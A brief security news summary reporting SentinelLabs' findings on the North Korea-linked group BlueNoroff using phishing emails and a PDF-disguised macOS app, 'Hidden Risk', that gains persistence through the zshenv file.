<ul><li>SentinelLabs observed North Korea-linked threat actor BlueNoroff targeting businesses in the crypto industry with a new multi-stage macOS malware called 'Hidden Risk.'</li><li>The attackers used fake cryptocurrency news emails and a malicious app disguised as a PDF document to initiate the attack.</li><li>The malware exploits a novel persistence method through the zshenv configuration file, bypassing macOS notifications and enhancing its stealthiness.</li><li>The campaign is attributed to BlueNoroff, known for targeting the crypto and Web3 sectors, and demonstrates their adaptability and refinement in attack methods.</li></ul>

DPRK-linked BlueNoroff used macOS malware with novel persistence

Discover more